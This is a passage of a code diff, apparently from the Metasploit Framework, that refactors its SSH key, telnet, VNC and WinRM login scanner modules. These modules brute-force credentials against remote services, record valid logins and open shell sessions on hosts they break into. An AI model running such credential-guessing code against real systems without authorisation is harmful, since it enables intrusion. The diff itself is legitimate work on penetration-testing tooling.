+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: result.credential.realm_key,
+            realm_value: result.credential.realm,
+            status: result.status
+        )
+        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+        else
+          invalidate_login(
+              address: ip,
+              port: rport,
+              protocol: 'tcp',
+              public: result.credential.public,
+              private: result.credential.private,
+              realm_key: result.credential.realm_key,
+              realm_value: result.credential.realm,
+              status: result.status
+          )
+          scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
       end
     end
   end
diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
index ea3e0fd261..f350a4bafc 100644
--- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
@@ -5,6 +5,7 @@
 
 require 'msf/core'
 require 'net/ssh'
+require 'metasploit/framework/login_scanner/ssh'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -13,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::CommandShell
 
-  attr_accessor :ssh_socket, :good_credentials, :good_key, :good_key_data
+  attr_accessor :ssh_socket, :good_key
 
   def initialize
     super(
@@ -40,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(22),
-        OptPath.new('KEY_FILE', [false, 'Filename of one or several cleartext private keys.'])
+        OptPath.new('KEY_PATH', [true, 'Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped.']),
       ], self.class
     )
 
@@ -48,14 +49,12 @@ class Metasploit3 < Msf::Auxiliary
       [
         OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
         OptString.new('SSH_KEYFILE_B64', [false, 'Raw data of an unencrypted SSH public key. This should be used by programmatic interfaces to this module only.', '']),
-        OptPath.new('KEY_DIR', [false, 'Directory of several cleartext private keys. Filenames must not begin with a dot, or end in ".pub" in order to be read.']),
         OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
       ]
     )
 
-    deregister_options('RHOST','PASSWORD','PASS_FILE','BLANK_PASSWORDS','USER_AS_PASS')
+    deregister_options('RHOST','PASSWORD','PASS_FILE','BLANK_PASSWORDS','USER_AS_PASS','USERPASS_FILE')
 
-    @good_credentials = {}
     @good_key = ''
     @strip_passwords = true
 
@@ -138,213 +137,226 @@ class Metasploit3 < Msf::Auxiliary
     return cleartext_keys
   end
 
-  def do_login(ip,user,port)
-    if datastore['KEY_FILE'] and File.readable?(datastore['KEY_FILE'])
-      keys = read_keyfile(datastore['KEY_FILE'])
-      cleartext_keys = pull_cleartext_keys(keys)
-      msg = "#{ip}:#{rport} SSH - Trying #{cleartext_keys.size} cleartext key#{(cleartext_keys.size > 1) ? "s" : ""} per user."
-    elsif datastore['SSH_KEYFILE_B64'] && !datastore['SSH_KEYFILE_B64'].empty?
-      keys = read_keyfile(:keyfile_b64)
-      cleartext_keys = pull_cleartext_keys(keys)
-      msg = "#{ip}:#{rport} SSH - Trying #{cleartext_keys.size} cleartext key#{(cleartext_keys.size > 1) ? "s" : ""} per user (read from datastore)."
-    elsif datastore['KEY_DIR']
-      return :missing_keyfile unless(File.directory?(key_dir) && File.readable?(key_dir))
-      unless @key_files
-        @key_files = Dir.entries(key_dir).reject {|f| f =~ /^\x2e/ || f =~ /\x2epub$/}
-      end
-      these_keys = @key_files.map {|f| File.join(key_dir,f)}
-      keys = read_keyfile(these_keys)
-      cleartext_keys = pull_cleartext_keys(keys)
-      msg = "#{ip}:#{rport} SSH - Trying #{cleartext_keys.size} cleartext key#{(cleartext_keys.size > 1) ? "s" : ""} per user."
-    else
-      return :missing_keyfile
-    end
-    unless @alerted_with_msg
-      print_status msg
-      @alerted_with_msg = true
-    end
-    cleartext_keys.each_with_index do |key_data,key_idx|
-      opt_hash = {
-        :auth_methods => ['publickey'],
-        :msframework  => framework,
-        :msfmodule    => self,
-        :port         => port,
-        :key_data     => key_data,
-        :disable_agent => true,
-        :config => false,
-        :record_auth_info => true,
-        :proxies	=> datastore['Proxies']
-      }
-      opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
-      begin
-        ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
-          self.ssh_socket = Net::SSH.start(
-            ip,
-            user,
-            opt_hash
-          )
-        end
-      rescue Rex::ConnectionError, Rex::AddressInUse
-        return :connection_error
-      rescue Net::SSH::Disconnect, ::EOFError
-        return :connection_disconnect
-      rescue ::Timeout::Error
-        return :connection_disconnect
-      rescue Net::SSH::AuthenticationFailed
-        # Try, try, again
-        if @key_files
-          vprint_error "#{ip}:#{rport} SSH - Failed authentication, trying key #{@key_files[key_idx+1]}"
-        else
-          vprint_error "#{ip}:#{rport} SSH - Failed authentication, trying key #{key_idx+1}"
-        end
-        next
-      rescue Net::SSH::Exception => e
-        return [:fail,nil] # For whatever reason.
-      end
-      break
-    end
+  def session_setup(result, ssh_socket)
+    return unless ssh_socket
 
-    if self.ssh_socket
-      self.good_key = self.ssh_socket.auth_info[:pubkey_id]
-      self.good_key_data = self.ssh_socket.options[:key_data]
-      proof = ''
-      begin
-        Timeout.timeout(5) do
-          proof = self.ssh_socket.exec!("id\n").to_s
-          if(proof =~ /id=/)
-            proof << self.ssh_socket.exec!("uname -a\n").to_s
-          else
-            # Cisco IOS
-            if proof =~ /Unknown command or computer name/
-              proof = self.ssh_socket.exec!("ver\n").to_s
-            else
-              proof << self.ssh_socket.exec!("help\n?\n\n\n").to_s
-            end
-          end
-        end
-      rescue ::Exception
-      end
+    # Create a new session from the socket
+    conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
 
-      # Create a new session from the socket, then dump it.
-      conn = Net::SSH::CommandStream.new(self.ssh_socket, '/bin/sh', true)
-      self.ssh_socket = nil
-
-      # Clean up the stored data - need to stash the keyfile into
-      # a datastore for later reuse.
-      merge_me = {
-        'USERPASS_FILE'  => nil,
-        'USER_FILE'      => nil,
-        'PASS_FILE'      => nil,
-        'USERNAME'       => user
-      }
-      if datastore['KEY_FILE'] and !datastore['KEY_FILE'].empty?
-        keyfile = File.open(datastore['KEY_FILE'], "rb") {|f| f.read(f.stat.size)}
-        merge_me.merge!(
-          'SSH_KEYFILE_B64' => [keyfile].pack("m*").gsub("\n",""),
-          'KEY_FILE'        => nil
-          )
-      end
-
-      s = start_session(self, "SSH #{user}:#{self.good_key} (#{ip}:#{port})", merge_me, false, conn.lsock)
-
-      # Set the session platform
-      case proof
-      when /Linux/
-        s.platform = "linux"
-      when /Darwin/
-        s.platform = "osx"
-      when /SunOS/
-        s.platform = "solaris"
-      when /BSD/
-        s.platform = "bsd"
-      when /HP-UX/
-        s.platform = "hpux"
-      when /AIX/
-        s.platform = "aix"
-      when /Win32|Windows/
-        s.platform = "windows"
-      when /Unknown command or computer name/
-        s.platform = "cisco-ios"
-      end
-
-      return [:success, proof]
-    else
-      return [:fail, nil]
-    end
-  end
-
-  def do_report(ip, port, user, proof)
-    return unless framework.db.active
-    keyfile_path = store_keyfile(ip,user,self.good_key,self.good_key_data)
-    cred_hash = {
-      :host => ip,
-      :port => datastore['RPORT'],
-      :sname => 'ssh',
-      :user => user,
-      :pass => keyfile_path,
-      :type => "ssh_key",
-      :proof => "KEY=#{self.good_key}, PROOF=#{proof}",
-      :duplicate_ok => true,
-        :active => true
+    # Clean up the stored data - need to stash the keyfile into
+    # a datastore for later reuse.
+    merge_me = {
+      'USERPASS_FILE'  => nil,
+      'USER_FILE'      => nil,
+      'PASS_FILE'      => nil,
+      'USERNAME'       => result.credential.public,
+      'SSH_KEYFILE_B64' => [result.credential.private].pack("m*").gsub("\n",""),
+      'KEY_PATH'        => nil
     }
-    this_cred = report_auth_info(cred_hash)
-  end
 
-  def existing_loot(ltype, key_id)
-    framework.db.loots(myworkspace).find_all_by_ltype(ltype).select {|l| l.info == key_id}.first
-  end
+    info = "SSH #{result.credential.public}:#{ssh_socket.auth_info[:pubkey_id]} (#{ip}:#{rport})"
+    s = start_session(self, info, merge_me, false, conn.lsock)
 
-  def store_keyfile(ip,user,key_id,key_data)
-    safe_username = user.gsub(/[^A-Za-z0-9]/,"_")
-    case key_data
-    when /BEGIN RSA PRIVATE/m
-      ktype = "rsa"
-    when /BEGIN DSA PRIVATE/m
-      ktype = "dsa"
-    else
-      ktype = nil
+    # Set the session platform
+    case result.proof
+    when /Linux/
+      s.platform = "linux"
+    when /Darwin/
+      s.platform = "osx"
+    when /SunOS/
+      s.platform = "solaris"
+    when /BSD/
+      s.platform = "bsd"
+    when /HP-UX/
+      s.platform = "hpux"
+    when /AIX/
+      s.platform = "aix"
+    when /Win32|Windows/
+      s.platform = "windows"
+    when /Unknown command or computer name/
+      s.platform = "cisco-ios"
     end
-    return unless ktype
-    ltype = "host.unix.ssh.#{user}_#{ktype}_private"
-    keyfile = existing_loot(ltype, key_id)
-    return keyfile.path if keyfile
-    keyfile_path = store_loot(
-      ltype,
-      "application/octet-stream", # Text, but always want to mime-type attach it
-      ip,
-      (key_data + "\n"),
-      "#{safe_username}_#{ktype}.key",
-      key_id
-    )
-    return keyfile_path
+
+    s
+  end
+
+  def do_report(ip, port, result)
+    service_data = {
+      address: ip,
+      port: port,
+      service_name: 'ssh',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credentail_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      private_data: result.credential.private,
+      private_type: :ssh_key,
+      username: result.credential.public,
+    }.merge(service_data)
+
+    credential_core = create_credential(credentail_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: result.status,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   def run_host(ip)
     print_status("#{ip}:#{rport} SSH - Testing Cleartext Keys")
-    # Since SSH collects keys and tries them all on one authentication session, it doesn't
-    # make sense to iteratively go through all the keys individually. So, ignore the pass variable,
-    # and try all available keys for all users.
-    each_user_pass do |user,pass|
-      ret,proof = do_login(ip,user,rport)
-      case ret
-      when :success
-        print_brute :level => :good, :msg => "Success: '#{user}':'#{self.good_key}' '#{proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
-        do_report(ip, rport, user, proof)
-        :next_user
-      when :connection_error
-        vprint_error "#{ip}:#{rport} SSH - Could not connect"
-        :abort
-      when :connection_disconnect
-        vprint_error "#{ip}:#{rport} SSH - Connection timed out"
-        :abort
-      when :fail
-        vprint_error "#{ip}:#{rport} SSH - Failed: '#{user}'"
-      when :missing_keyfile
-        vprint_error "#{ip}:#{rport} SSH - Cannot read keyfile."
-      when :no_valid_keys
-        vprint_error "#{ip}:#{rport} SSH - No cleartext keys in keyfile."
-      end
+
+    if datastore["USER_FILE"].blank? && datastore["USERNAME"].blank?
+      # Ghetto abuse of the way OptionValidateError expects an array of
+      # option names instead of a string message like every sane
+      # subclass of Exception.
+      raise OptionValidateError, ["At least one of USER_FILE or USERNAME must be given"]
     end
+
+    keys = KeyCollection.new(
+      key_path: datastore['KEY_PATH'],
+      user_file: datastore['USER_FILE'],
+      username: datastore['USERNAME'],
+    )
+
+    print_brute :level => :vstatus, :ip => ip, :msg => "Testing #{keys.key_data.count} keys"
+    scanner = Metasploit::Framework::LoginScanner::SSH.new(
+      host: ip,
+      port: rport,
+      cred_details: keys,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      connection_timeout: datastore['SSH_TIMEOUT'],
+    )
+
+    scanner.scan! do |result|
+
+      case result.status
+      when Metasploit::Model::Login::Status::SUCCESSFUL
+        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential.public}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
+        do_report(ip,rport,result)
+        session_setup(result, scanner.ssh_socket)
+        :next_user
+      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        print_brute :level => :verror, :ip => ip, :msg => "Could not connect"
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: result.credential.realm_key,
+            realm_value: result.credential.realm,
+            status: result.status
+        )
+        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+        :abort
+      when Metasploit::Model::Login::Status::INCORRECT
+        print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: result.credential.realm_key,
+            realm_value: result.credential.realm,
+            status: result.status
+        )
+        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+        else
+          invalidate_login(
+              address: ip,
+              port: rport,
+              protocol: 'tcp',
+              public: result.credential.public,
+              private: result.credential.private,
+              realm_key: result.credential.realm_key,
+              realm_value: result.credential.realm,
+              status: result.status
+          )
+          scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+      end
+
+    end
+
   end
 
+  class KeyCollection
+    attr_accessor :key_data
+
+    def initialize(opts={})
+      @username = opts[:username]
+      @user_file = opts[:user_file]
+      @key_path = opts.fetch(:key_path)
+
+      valid!
+    end
+
+    def realm
+      nil
+    end
+
+    def valid!
+      @key_data = Set.new
+      if File.directory?(@key_path)
+        @key_files ||= Dir.entries(@key_path).reject { |f| f =~ /^\x2e|\x2epub$/ }
+        @key_files.each do |f|
+          data = read_key(File.join(@key_path, f))
+          @key_data << data if valid_key?(data)
+        end
+      elsif File.file?(@key_path)
+        data = read_key(@key_path)
+        @key_data << data if valid_key?(data)
+      else
+        raise RuntimeError, "No key path"
+      end
+    end
+
+    def valid_key?(key_data)
+      !!(key_data.match(/BEGIN [RD]SA PRIVATE KEY/) && !key_data.match(/Proc-Type:.*ENCRYPTED/))
+    end
+
+    def each
+      if @user_file.present?
+        File.open(@user_file, 'rb') do |user_fd|
+          user_fd.each_line do |user_from_file|
+            user_from_file.chomp!
+            each_key do |key_data|
+              yield Metasploit::Framework::Credential.new(public: user_from_file, private: key_data, realm: realm, private_type: :ssh_key)
+            end
+          end
+        end
+      end
+
+      if @username.present?
+        each_key do |key_data|
+          yield Metasploit::Framework::Credential.new(public: @username, private: key_data, realm: realm, private_type: :ssh_key)
+        end
+      end
+    end
+
+    def each_key
+      @key_data.each do |data|
+        yield data
+      end
+    end
+
+    def read_key(filename)
+      @cache ||= {}
+      unless @cache[filename]
+        data = File.open(filename, 'rb') { |fd| fd.read(fd.stat.size) }
+        #if data.match
+
+        @cache[filename] = data
+      end
+
+      @cache[filename]
+    end
+
+  end
 end
diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb
index 9a86ba1370..31a67875de 100644
--- a/modules/auxiliary/scanner/telnet/telnet_login.rb
+++ b/modules/auxiliary/scanner/telnet/telnet_login.rb
@@ -4,6 +4,9 @@
 ##
 
 require 'msf/core'
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/telnet'
+
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -33,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
     deregister_options('RHOST')
     register_advanced_options(
       [
-        OptInt.new('TIMEOUT', [ true, 'Default timeout for telnet connections. The greatest value of TelnetTimeout, TelnetBannerTimeout, or this option will be used as an overall timeout.', 0])
+        OptInt.new('TIMEOUT', [ true, 'Default timeout for telnet connections.', 25])
       ], self.class
     )
 
@@ -44,190 +47,74 @@ class Metasploit3 < Msf::Auxiliary
   attr_accessor :password_only
 
   def run_host(ip)
-    overall_timeout ||= [
-      datastore['TIMEOUT'].to_i,
-      datastore['TelnetBannerTimeout'].to_i,
-      datastore['TelnetTimeout'].to_i
-    ].max
-
-    # Check for a password-only prompt for this machine.
-    self.password_only = []
-    if connect_reset_safe == :connected
-      @strip_usernames = true if password_prompt?
-      self.sock.close
-    end
-
-    begin
-      each_user_pass do |user, pass|
-        Timeout.timeout(overall_timeout) do
-          res = try_user_pass(user, pass)
-          start_telnet_session(rhost,rport,user,pass) if res == :next_user
-        end
-      end
-    rescue ::Rex::ConnectionError, ::EOFError, ::Timeout::Error
-      return
-    end
-  end
-
-  def try_user_pass(user, pass)
-    vprint_status "#{rhost}:#{rport} Telnet - Attempting: '#{user}':'#{pass}'"
-    this_attempt ||= 0
-    ret = nil
-    while this_attempt <=3 and (ret.nil? or ret == :refused)
-      if this_attempt > 0
-        select(nil,nil,nil,2**this_attempt)
-        vprint_error "#{rhost}:#{rport} Telnet - Retrying '#{user}':'#{pass}' due to reset"
-      end
-      ret = do_login(user,pass)
-      this_attempt += 1
-    end
-    case ret
-    when :no_auth_required
-      print_good "#{rhost}:#{rport} Telnet - No authentication required!"
-      report_telnet('','',@trace)
-      return :abort
-    when :no_pass_prompt
-      vprint_status "#{rhost}:#{rport} Telnet - Skipping '#{user}' due to missing password prompt"
-      return :skip_user
-    when :timeout
-      vprint_status "#{rhost}:#{rport} Telnet - Skipping '#{user}':'#{pass}' due to timeout"
-    when :busy
-      vprint_error "#{rhost}:#{rport} Telnet - Skipping '#{user}':'#{pass}' due to busy state"
-    when :refused
-      vprint_error "#{rhost}:#{rport} Telnet - Skipping '#{user}':'#{pass}' due to connection refused."
-    when :skip_user
-      vprint_status "#{rhost}:#{rport} Telnet - Skipping disallowed user '#{user}' for subsequent requests"
-      return :skip_user
-    when :success
-      unless user == user.downcase
-        case_ret = do_login(user.downcase,pass)
-        if case_ret == :success
-          user= user.downcase
-          print_status("Username #{user} is case insensitive")
-        end
-      end
-      report_telnet(user,pass,@trace)
-      return :next_user
-    end
-  end
-
-  # Sometimes telnet servers start RSTing if you get them angry.
-  # This is a short term fix; the problem is that we don't know
-  # if it's going to reset forever, or just this time, or randomly.
-  # A better solution is to get the socket connect to try again
-  # with a little backoff.
-  def connect_reset_safe
-    begin
-      connect
-    rescue Rex::ConnectionRefused
-      return :refused
-    end
-    return :connected
-  end
-
-  # Making this serial since the @attempts counting business is causing
-  # all kinds of syncing problems.
-  def do_login(user,pass)
-
-    return :refused if connect_reset_safe == :refused
-
-    begin
-
-    vprint_status("#{rhost}:#{rport} Banner: #{@recvd.gsub(/[\r\n\e\b\a]/, ' ')}")
-
-    if busy_message?
-      self.sock.close unless self.sock.closed?
-      return :busy
-    end
-
-    if login_succeeded?
-      return :no_auth_required
-    end
-
-    # Immediate password prompt... try our password!
-    if password_prompt?
-      user = ''
-
-      if password_only.include?(pass)
-        print_status("#{rhost}:#{rport} - Telnet - skipping already tried password '#{pass}'")
-        return :tried
-      end
-
-      print_status("#{rhost}:#{rport} - Telnet - trying password only authentication with password '#{pass}'")
-      password_only << pass
-    else
-      send_user(user)
-    end
-
-    recvd_sample = @recvd.dup
-    # Allow for slow echos
-    1.upto(10) do
-      recv_telnet(self.sock, 0.10) unless @recvd.nil? or @recvd[/#{@password_prompt}/]
-    end
-
-    vprint_status("#{rhost}:#{rport} Prompt: #{@recvd.gsub(/[\r\n\e\b\a]/, ' ')}")
-
-    if password_prompt?(user)
-      send_pass(pass)
-
-      # Allow for slow echos
-      1.upto(10) do
-        recv_telnet(self.sock, 0.10) if @recvd == recvd_sample
-      end
-
-
-      vprint_status("#{rhost}:#{rport} Result: #{@recvd.gsub(/[\r\n\e\b\a]/, ' ')}")
-
-      if login_succeeded?
-        return :success
-      else
-        self.sock.close unless self.sock.closed?
-        if @recvd =~ /Not on system console/ # Solaris8, user is not allowed
-          return :skip_user
-        else
-          return :fail
-        end
-      end
-    else
-      if login_succeeded? && @recvd !~ /^#{user}\x0d*\x0a/
-        report_telnet(user,pass,@trace)
-        return :no_pass_required
-      else
-        self.sock.close unless self.sock.closed?
-        return :no_pass_prompt
-      end
-    end
-
-    rescue ::Interrupt
-      self.sock.close unless self.sock.closed?
-      raise $!
-    rescue ::Exception => e
-      if e.to_s == "execution expired"
-        self.sock.close unless self.sock.closed?
-        return :timeout
-      else
-        self.sock.close unless self.sock.closed?
-        print_error("#{rhost}:#{rport} Error: #{e.class} #{e} #{e.backtrace}")
-      end
-    end
-
-  end
-
-  def report_telnet(user, pass, proof)
-    print_good("#{rhost} - SUCCESSFUL LOGIN #{user} : #{pass}")
-    report_auth_info(
-      :host	=> rhost,
-      :port	=> datastore['RPORT'],
-      :sname	=> 'telnet',
-      :user	=> user,
-      :pass	=> pass,
-      :proof  => proof,
-      :source_type => "user_supplied",
-      :active => true
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+        blank_passwords: datastore['BLANK_PASSWORDS'],
+        pass_file: datastore['PASS_FILE'],
+        password: datastore['PASSWORD'],
+        user_file: datastore['USER_FILE'],
+        userpass_file: datastore['USERPASS_FILE'],
+        username: datastore['USERNAME'],
+        user_as_pass: datastore['USER_AS_PASS'],
     )
+
+    scanner = Metasploit::Framework::LoginScanner::Telnet.new(
+        host: ip,
+        port: rport,
+        proxies: datastore['PROXIES'],
+        cred_details: cred_collection,
+        stop_on_success: datastore['STOP_ON_SUCCESS'],
+        connection_timeout: datastore['Timeout'],
+        banner_timeout: datastore['TelnetBannerTimeout'],
+        telnet_timeout: datastore['TelnetTimeout']
+    )
+
+    service_data = {
+        address: ip,
+        port: rport,
+        service_name: 'telnet',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    scanner.scan! do |result|
+      if result.success?
+        credential_data = {
+            module_fullname: self.fullname,
+            origin_type: :service,
+            private_data: result.credential.private,
+            private_type: :password,
+            username: result.credential.public
+        }
+        credential_data.merge!(service_data)
+
+        credential_core = create_credential(credential_data)
+
+        login_data = {
+            core: credential_core,
+            last_attempted_at: DateTime.now,
+            status: Metasploit::Model::Login::Status::SUCCESSFUL
+        }
+        login_data.merge!(service_data)
+
+        create_credential_login(login_data)
+        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
+        start_telnet_session(ip,rport,result.credential.public,result.credential.private,scanner)
+      else
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: result.credential.public,
+            private: result.credential.private,
+            realm_key: nil,
+            realm_value: nil,
+            status: result.status)
+        print_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
+      end
+    end
   end
 
-  def start_telnet_session(host, port, user, pass)
+  def start_telnet_session(host, port, user, pass, scanner)
     print_status "Attempting to start session #{host}:#{port} with #{user}:#{pass}"
     merge_me = {
       'USERPASS_FILE' => nil,
@@ -237,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary
       'PASSWORD'      => pass
     }
 
-    start_session(self, "TELNET #{user}:#{pass} (#{host}:#{port})", merge_me, true)
+    start_session(self, "TELNET #{user}:#{pass} (#{host}:#{port})", merge_me, true, scanner.sock)
   end
 
 end
diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb
index cdbc2af39f..a45481d81b 100644
--- a/modules/auxiliary/scanner/vnc/vnc_login.rb
+++ b/modules/auxiliary/scanner/vnc/vnc_login.rb
@@ -5,6 +5,8 @@
 
 require 'msf/core'
 require 'rex/proto/rfb'
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/vnc'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -56,82 +58,68 @@ class Metasploit3 < Msf::Auxiliary
   def run_host(ip)
     print_status("#{ip}:#{rport} - Starting VNC login sweep")
 
-    begin
-      each_user_pass { |user, pass|
-        ret = nil
-        attempts = 5
-        attempts.times { |n|
-          ret = do_login(user, pass)
-          break if ret != :retry
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+        blank_passwords: datastore['BLANK_PASSWORDS'],
+        pass_file: datastore['PASS_FILE'],
+        password: datastore['PASSWORD'],
+        user_file: datastore['USER_FILE'],
+        userpass_file: datastore['USERPASS_FILE'],
+        username: datastore['USERNAME'],
+        user_as_pass: datastore['USER_AS_PASS']
+    )
 
-          delay = (2**(n+1)) + 1
-          vprint_status("Retrying in #{delay} seconds...")
-          select(nil, nil, nil, delay)
+    scanner = Metasploit::Framework::LoginScanner::VNC.new(
+        host: ip,
+        port: rport,
+        proxies: datastore['PROXIES'],
+        cred_details: cred_collection,
+        stop_on_success: datastore['STOP_ON_SUCCESS'],
+        connection_timeout: datastore['ConnectTimeout']
+    )
+
+    service_data = {
+        address: ip,
+        port: rport,
+        service_name: 'vnc',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    scanner.scan! do |result|
+      if result.success?
+        credential_data = {
+            module_fullname: self.fullname,
+            origin_type: :service,
+            private_data: result.credential.private,
+            private_type: :password,
         }
-        # If we tried all these attempts, and we still got a retry condition,
-        # we'll just give up.. Must be that nasty blacklist algorithm kicking
-        # our butt.
-        return :abort if ret == :retry
-        ret
-      }
-    rescue ::Rex::ConnectionError
-      nil
-    end
-  end
+        credential_data.merge!(service_data)
 
-  def do_login(user, pass)
-    vprint_status("#{target_host}:#{rport} - Attempting VNC login with password '#{pass}'")
+        credential_core = create_credential(credential_data)
 
-    connect
+        login_data = {
+            core: credential_core,
+            last_attempted_at: DateTime.now,
+            status: Metasploit::Model::Login::Status::SUCCESSFUL
+        }
+        login_data.merge!(service_data)
 
-    begin
-      vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)
-      if not vnc.handshake
-        vprint_error("#{target_host}:#{rport}, #{vnc.error}")
-        return :abort
+        create_credential_login(login_data)
+        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
+      else
+        invalidate_login(
+            address: ip,
+            port: rport,
+            protocol: 'tcp',
+            public: nil,
+            private: result.credential.private,
+            realm_key: nil,
+            realm_value: nil,
+            status: result.status)
+        print_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
       end
-
-      ver = "#{vnc.majver}.#{vnc.minver}"
-      vprint_status("#{target_host}:#{rport}, VNC server protocol version : #{ver}")
-      report_service(
-        :host => rhost,
-        :port => rport,
-        :proto => 'tcp',
-        :name => 'vnc',
-        :info => "VNC protocol version #{ver}"
-      )
-
-      if not vnc.authenticate(pass)
-        vprint_error("#{target_host}:#{rport}, #{vnc.error}")
-        return :retry if vnc.error =~ /connection has been rejected/ # UltraVNC
-        return :retry if vnc.error =~ /Too many security failures/   # vnc4server
-        return :fail
-      end
-
-      print_good("#{target_host}:#{rport}, VNC server password : \"#{pass}\"")
-
-      access_type = "password"
-      #access_type = "view-only password" if vnc.view_only_mode
-      report_auth_info({
-        :host => rhost,
-        :port => rport,
-        :sname => 'vnc',
-        :pass => pass,
-        :type => access_type,
-        :duplicate_ok => true,
-        :source_type => "user_supplied",
-        :active => true
-      })
-      return :next_user
-
-    # For debugging only.
-    #rescue ::Exception
-    #	raise $!
-    #	print_error("#{$!}")
-
-    ensure
-      disconnect()
     end
+
   end
 
 end
diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb
index 5c8dfe1f83..12b8d83d0b 100644
--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -6,6 +6,9 @@
 
 require 'msf/core'
 require 'rex/proto/ntlm/message'
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner'
+require 'metasploit/framework/login_scanner/winrm'
 
 class Metasploit3 < Msf::Auxiliary
 
@@ -37,34 +40,65 @@ class Metasploit3 < Msf::Auxiliary
 
 
   def run_host(ip)
-    each_user_pass do |user, pass|
-      resp = send_winrm_request(test_request)
-      if resp.nil?
-        print_error "#{ip}:#{rport}:  Got no reply from the server, connection may have timed out"
-        return
-      elsif  resp.code == 200
-        cred_hash = {
-          :host              => ip,
-          :port              => rport,
-          :sname          => 'winrm',
-          :pass              => pass,
-          :user              => user,
-          :source_type => "user_supplied",
-          :active            => true
+    cred_collection = Metasploit::Framework::CredentialCollection.new(
+      blank_passwords: datastore['BLANK_PASSWORDS'],
+      pass_file: datastore['PASS_FILE'],
+      password: datastore['PASSWORD'],
+      user_file: datastore['USER_FILE'],
+      userpass_file: datastore['USERPASS_FILE'],
+      username: datastore['USERNAME'],
+      user_as_pass: datastore['USER_AS_PASS'],
+      realm: datastore['DOMAIN'],
+    )
+    scanner = Metasploit::Framework::LoginScanner::WinRM.new(
+      host: ip,
+      port: rport,
+      proxies: datastore["PROXIES"],
+      cred_details: cred_collection,
+      stop_on_success: datastore['STOP_ON_SUCCESS'],
+      connection_timeout: 10,
+    )
+    scanner.scan! do |result|
+      if result.success?
+
+        service_data = {
+          address: ip,
+          port: rport,
+          service_name: 'winrm',
+          protocol: 'tcp',
+          workspace_id: myworkspace_id
         }
-        report_auth_info(cred_hash)
-        print_good "#{ip}:#{rport}:  Valid credential found: #{user}:#{pass}"
-      elsif resp.code == 401
-        print_error "#{ip}:#{rport}:  Login failed: #{user}:#{pass}"
+
+        credential_data = {
+          module_fullname: self.fullname,
+          origin_type: :service,
+          private_data: result.credential.private,
+          private_type: :password,
+          username: result.credential.public,
+          realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+          realm_value: result.credential.realm,
+        }.merge(service_data)
+
+        credential_core = create_credential(credential_data)
+        login_data = {
+          access_level: 'Admin',
+          core: credential_core,
+          last_attempted_at: DateTime.now,
+          status: Metasploit::Model::Login::Status::SUCCESSFUL
+        }.merge(service_data)
+
+        create_credential_login(login_data)
+
+        print_good "#{ip}:#{rport}: Valid credential found: #{result.credential}"
       else
-        print_error "Recieved unexpected Response Code: #{resp.code}"
